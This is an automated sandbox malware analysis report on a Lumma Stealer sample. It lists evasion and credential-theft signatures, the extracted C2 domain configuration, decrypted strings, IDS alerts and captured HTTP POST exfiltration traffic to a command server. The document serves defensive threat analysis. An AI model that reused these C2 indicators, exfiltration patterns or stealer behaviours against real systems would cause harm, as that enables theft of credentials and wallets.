Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hx0wBsOjkQ.exe

Overview

General Information

Sample name:hx0wBsOjkQ.exe
renamed because original name is a hash value
Original sample name:e58e6e26d4ff748bd8e7f718372f8351.exe
Analysis ID:1581582
MD5:e58e6e26d4ff748bd8e7f718372f8351
SHA1:5ec62018f2c5e2f7b91be03fa1c022ad3368cab8
SHA256:1b7cdc9c01de521674db6bc4f5ef66d4666d084cf197b8adec56bc431992c253
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • hx0wBsOjkQ.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\hx0wBsOjkQ.exe" MD5: E58E6E26D4FF748BD8E7F718372F8351)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "mindhandru.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1627174690.0000000000E20000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1624031849.0000000000E20000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1599366163.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1626918311.0000000000E20000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:39.410611+010020283713Unknown Traffic192.168.2.104970023.55.153.106443TCP
                2024-12-28T09:29:41.830604+010020283713Unknown Traffic192.168.2.1049701172.67.157.254443TCP
                2024-12-28T09:29:43.843810+010020283713Unknown Traffic192.168.2.1049702172.67.157.254443TCP
                2024-12-28T09:29:46.317494+010020283713Unknown Traffic192.168.2.1049703172.67.157.254443TCP
                2024-12-28T09:29:48.506896+010020283713Unknown Traffic192.168.2.1049704172.67.157.254443TCP
                2024-12-28T09:29:51.109686+010020283713Unknown Traffic192.168.2.1049705172.67.157.254443TCP
                2024-12-28T09:29:54.467025+010020283713Unknown Traffic192.168.2.1049707172.67.157.254443TCP
                2024-12-28T09:29:57.393602+010020283713Unknown Traffic192.168.2.1049710172.67.157.254443TCP
                2024-12-28T09:30:00.285341+010020283713Unknown Traffic192.168.2.1049711172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:42.579579+010020546531A Network Trojan was detected192.168.2.1049701172.67.157.254443TCP
                2024-12-28T09:29:44.589530+010020546531A Network Trojan was detected192.168.2.1049702172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:42.579579+010020498361A Network Trojan was detected192.168.2.1049701172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:44.589530+010020498121A Network Trojan was detected192.168.2.1049702172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:37.387470+010020585721Domain Observed Used for C2 Detected192.168.2.10509161.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:37.530359+010020585761Domain Observed Used for C2 Detected192.168.2.10527031.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:37.676217+010020585781Domain Observed Used for C2 Detected192.168.2.10529901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:37.100521+010020585801Domain Observed Used for C2 Detected192.168.2.10593211.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:36.356310+010020585821Domain Observed Used for C2 Detected192.168.2.10552841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:36.561159+010020585841Domain Observed Used for C2 Detected192.168.2.10602681.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:36.804865+010020585861Domain Observed Used for C2 Detected192.168.2.10548301.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:36.952553+010020585881Domain Observed Used for C2 Detected192.168.2.10587401.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:37.245130+010020585901Domain Observed Used for C2 Detected192.168.2.10601021.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:49.645133+010020480941Malware Command and Control Activity Detected192.168.2.1049704172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:29:40.200416+010028586661Domain Observed Used for C2 Detected192.168.2.104970023.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: hx0wBsOjkQ.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/apiptAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/m/Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com:443/apirofiles/76561199724331900Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/piAAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apillAvira URL Cloud: Label: malware
                Source: https://prisonyfork.buzz:443/apiaAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apisAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/9Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apiaLxzAvira URL Cloud: Label: malware
                Source: https://scentniej.buzz:443/apiAvira URL Cloud: Label: malware
                Source: https://cashfuzysao.buzz:443/apiAvira URL Cloud: Label: malware
                Source: https://hummskitnj.buzz:443/apiAvira URL Cloud: Label: malware
                Found malware configuration
                Source: hx0wBsOjkQ.exe.8048.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "mindhandru.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: hx0wBsOjkQ.exeVirustotal: Detection: 53%Perma Link
                Source: hx0wBsOjkQ.exeReversingLabs: Detection: 57%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: hx0wBsOjkQ.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_003F57C0 CryptUnprotectData,0_2_003F57C0
                Source: hx0wBsOjkQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.10:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49710 version: TLS 1.2
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov ecx, eax0_2_0040D17D
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00420340
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040D34A
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov eax, ebx0_2_00407440
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_00407440
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov edx, ebx0_2_003E8600
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00421720
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00401A10
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_003E8A50
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_003ECC7A
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_00420D20
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov esi, ecx0_2_004090D0
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040E0DA
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040C0E6
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040C09E
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040C09E
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]0_2_00421160
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0040B170
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov ecx, eax0_2_0040D116
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov eax, dword ptr [00426130h]0_2_003F8169
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004081CC
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00416210
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov ecx, eax0_2_003FC300
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004083D8
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_003E73D0
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_003E73D0
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_0040C465
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0040C465
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov word ptr [eax], cx0_2_003F747D
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 4x nop then mov word ptr [edx], di0_2_003F747D

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.10:60268 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.10:59321 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.10:58740 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.10:55284 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.10:60102 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.10:50916 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.10:52990 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.10:52703 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.10:54830 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49701 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49701 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49700 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49702 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49702 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49704 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49700 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49704 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49710 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49711 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49702 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=37NC9T5A4478IQUMNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J41QSBOUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15014Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SCT42TTR89User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V7XJLHITGPCIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1210Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L4TJPNUKPYCP0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568342Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
